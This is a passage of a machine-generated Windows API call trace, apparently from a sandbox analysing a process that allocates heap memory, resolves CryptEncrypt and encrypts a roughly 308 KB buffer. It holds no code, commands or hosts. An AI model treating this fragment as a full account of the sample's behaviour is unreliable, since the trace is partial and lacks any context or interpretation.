[0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0199.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0199.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0199.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0199.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0199.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0199.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0199.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0199.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0199.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0199.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0199.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0199.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0199.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0199.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0199.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0199.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0199.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0199.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50aa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0199.768] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0199.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0199.769] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4b640, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4b648) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0199.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0199.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0199.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0199.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0199.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.772] CharLowerBuffW (in: lpsz="byte[308808]", cchLength=0xc | out: lpsz="byte[308808]") returned 0xc [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0199.777] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.798] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0199.798] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0199.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0199.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0199.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0199.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0199.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b640) returned 0x3cc2328 [0199.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0199.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0199.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0199.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0199.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0199.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ae8 [0199.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ae8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0199.813] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3c76cd8*, pdwDataLen=0x8cef60*=0x4b640, dwBufLen=0x4b648 | out: pbData=0x3c76cd8*, pdwDataLen=0x8cef60*=0x4b648) returned 1 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0199.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 